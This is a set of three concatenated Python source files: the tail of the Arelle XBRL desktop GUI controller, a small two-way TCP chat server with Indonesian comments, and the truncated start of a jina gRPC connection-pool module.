elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI, indexLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl, lang=self.labelLang)
if firstTableLinkroleURI is not None:
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang, linkrole=indexLinkroleURI,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of DTS"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if (not modelXbrl.hasTableRendering and # table view only if not grid rendered view
modelXbrl.relationshipSet(XbrlConst.parentChild)): # requires presentation relationships to render this tab
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI is not None)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "dimensions relationships view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "anchoring relationships view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.widerNarrower, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
currentAction = "plugin method CntlrWinMain.Xbrl.Loaded"
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
self.currentView = None
def fileReopen(self, *ignore):
self.fileClose()
fileHistory = self.config.setdefault("fileHistory", [])
if len(fileHistory) > 0:
self.fileOpenFile(fileHistory[0])
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
thread = threading.Thread(target=self.backgroundValidate, daemon=True).start()
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=self.backgroundCompareDTSes, args=(versReportFile,), daemon=True).start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listbox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def setNoCertificateCheck(self, *args):
self.webCache.noCertificateCheck = self.noCertificateCheck.get() # resets proxy handlers
self.config["noCertificateCheck"] = self.webCache.noCertificateCheck
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=backgroundClearCache, daemon=True).start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
if self.modelManager.validateDedupCalcs:
c += _("\nDeduplicate calculations")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateDedupCalcs(self, *args):
self.modelManager.validateDedupCalcs = self.validateDedupCalcs.get()
self.config["validateDedupCalcs"] = self.modelManager.validateDedupCalcs
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def setShowDebugMessages(self, *args):
self.config["showDebugMessages"] = self.showDebugMessages.get()
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} ({1}bit)\n"
"An open source XBRL platform\n"
"\u00a9 2010-{2} Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2016 Python Software Foundation"
"\n Tcl/Tk {6} \u00a9 Univ. of Calif., Sun, Scriptics, ActiveState, and others"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"{3}"
"\n May include installable plug-in modules with author-specific license terms"
)
.format(Version.__version__, self.systemWordSize, Version.copyrightLatestYear,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp"
"\n CherryPy \u00a9 2002-2013 CherryPy Team") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION, Tcl().eval('info patchlevel')
))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", refs=[], level=logging.INFO):
if level < logging.INFO and not self.showDebugMessages.get():
return # skip DEBUG and INFO-RESULT messages
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if refs:
message += " - " + Cntlr.logRefsFileLines(refs)
elif file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
try:
message = message % messageArgs
except (KeyError, TypeError, ValueError) as ex:
message += " \nMessage log error: " + str(ex) + " \nMessage arguments: " + str(messageArgs)
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True;
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if isinstance(multFileNames, (tuple,list)):
return multFileNames
return re.findall("[{]([^}]+)[}]", # older multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
self.logRecordBuffer = None
def startLogBuffering(self):
if self.logRecordBuffer is None:
self.logRecordBuffer = []
def endLogBuffering(self):
self.logRecordBuffer = None
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
if self.logRecordBuffer is not None:
self.logRecordBuffer.append(logRecord)
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg, level=logRecord.levelno)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=30))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
if sys.platform == "darwin":
_resourcesDir = Cntlr.resourcesDir()
for _tcltk in ("tcl", "tk"):
for _tcltkVer in ("8.5", "8.6"):
_tcltkDir = os.path.join(_resourcesDir, _tcltk + _tcltkVer)
if os.path.exists(_tcltkDir):
os.environ[_tcltk.upper() + "_LIBRARY"] = _tcltkDir
elif sys.platform == 'win32':
if getattr(sys, 'frozen', False): # windows requires fake stdout/stderr because no write/flush (e.g., EdgarRenderer LocalViewer pybottle)
class dummyFrozenStream:
def __init__(self): pass
def write(self,data): pass
def read(self,data): pass
def flush(self): pass
def close(self): pass
sys.stdout = dummyFrozenStream()
sys.stderr = dummyFrozenStream()
sys.stdin = dummyFrozenStream()
global restartMain
while restartMain:
restartMain = False
try:
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelleGUI"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
application.mainloop()
except Exception: # unable to start Tk or other fatal error
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
logMsg = "{}\nCall Trace\n{}\nEnvironment {}".format(msg, tracebk, os.environ)
print(logMsg, file=sys.stderr)
if syslog is not None:
syslog.openlog("Arelle")
syslog.syslog(syslog.LOG_ALERT, logMsg)
try: # this may crash. Note syslog has 1k message length
logMsg = "tcl_pkgPath {} tcl_library {} tcl version {}".format(
Tcl().getvar("tcl_pkgPath"), Tcl().getvar("tcl_library"), Tcl().eval('info patchlevel'))
if syslog is not None:
syslog.syslog(syslog.LOG_ALERT, logMsg)
print(logMsg, file=sys.stderr)
except:
pass
if syslog is not None:
syslog.closelog()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
|
server.py
|
import socket
from threading import Thread
#configurasi server
listenerSocket = socket.socket()
serverIP = "0.0.0.0"
serverPort = 2222
def kirim_pesan(handlerSocket : socket.socket):
while True:
message = input()
handlerSocket.send(message.encode())
print("server : {}".format(message))
def terima_pesan(handlerSocket : socket.socket):
while True:
message = handlerSocket.recv(1024)
print("client : {}".format(message.decode('utf-8')))
#binding socket dengan IP dan port
listenerSocket.bind((serverIP,serverPort))
#listener socket siap menerima koneksi
listenerSocket.listen(0)
print("server menunggu koneksi dari client")
#listener socket menunggu koneksi dari client, line di bawah ini bersifat 'blocking'
#artinya, programmnya terhenti di sini sampai ada koneksi ke listenerSocket
handler, addr = listenerSocket.accept()
#jika sudah ada koneksi dari client, maka program akan jalan ke line ini
print("sebuah client terkoneksi dengan alamat:{}".format(addr))
t1 = Thread(target=kirim_pesan,args=(handler,))
t2 = Thread(target=terima_pesan,args=(handler,))
t1.start()
t2.start()
t1.join()
t2.join()
|
networking.py
|
import os
import asyncio
import ipaddress
from threading import Thread
from typing import Optional, List, Dict, TYPE_CHECKING, Tuple
from urllib.parse import urlparse
import grpc
from grpc.aio import AioRpcError
from jina.logging.logger import JinaLogger
from jina.proto import jina_pb2_grpc
from jina.enums import PollingType
from jina.helper import get_or_reuse_loop
from jina.types.request import Request
from jina.types.request.control import ControlRequest
from jina.types.request.data import DataRequest
if TYPE_CHECKING:
import kubernetes
class ReplicaList:
"""
Maintains a list of connections to replicas and uses round robin for selecting a replica
"""
def __init__(self):
self._connections = []
self._address_to_connection_idx = {}
self._address_to_channel = {}
self._rr_counter = 0
def add_connection(self, address: str):
"""
Add connection with address to the connection list
:param address: Target address of this connection
"""
if address not in self._address_to_connection_idx:
try:
parsed_address = urlparse(address)
address = parsed_address.netloc if parsed_address.netloc else address
use_https = parsed_address.scheme == 'https'
except:
use_https = False
self._address_to_connection_idx[address] = len(self._connections)
(
single_data_stub,
data_stub,
control_stub,
channel,
) = GrpcConnectionPool.create_async_channel_stub(address, https=use_https)
self._address_to_channel[address] = channel
self._connections.append((single_data_stub, data_stub, control_stub))
async def remove_connection(self, address: str):
"""
Remove connection with address from the connection list
:param address: Remove connection for this address
:returns: The removed connection or None if there was not any for the given address
"""
if address in self._address_to_connection_idx:
self._rr_counter = (
self._rr_counter % (len(self._connections) - 1)
if (len(self._connections) - 1)
else 0
)
idx_to_delete = self._address_to_connection_idx.pop(address)
popped_connection = self._connections.pop(idx_to_delete)
# we should handle graceful termination better, 0.5 is a rather random number here
await self._address_to_channel[address].close(0.5)
del self._address_to_channel[address]
# update the address/idx mapping
for address in self._address_to_connection_idx:
if self._address_to_connection_idx[address] > idx_to_delete:
self._address_to_connection_idx[address] -= 1
return popped_connection
return None
def get_next_connection(self):
"""
Returns a connection from the list. Strategy is round robin
:returns: A connection from the pool
"""
try:
connection = self._connections[self._rr_counter]
except IndexError:
# This can happen as a race condition while removing connections
self._rr_counter = 0
connection = self._connections[self._rr_counter]
self._rr_counter = (self._rr_counter + 1) % len(self._connections)
return connection
def get_all_connections(self):
"""
Returns all available connections
:returns: A complete list of all connections from the pool
"""
return self._connections
def has_connection(self, address: str) -> bool:
"""
Checks if a connection for ip exists in the list
:param address: The address to check
:returns: True if a connection for the ip exists in the list
"""
return address in self._address_to_connection_idx
def has_connections(self) -> bool:
"""
Checks if this contains any connection
:returns: True if any connection is managed, False otherwise
"""
return len(self._address_to_connection_idx) > 0
async def close(self):
"""
Close all connections and clean up internal state
"""
for address in self._address_to_channel:
await self._address_to_channel[address].close(0.5)
self._address_to_channel.clear()
self._address_to_connection_idx.clear()
self._connections.clear()
self._rr_counter = 0
class GrpcConnectionPool:
"""
Manages a list of grpc connections.
:param logger: the logger to use
"""
class _ConnectionPoolMap:
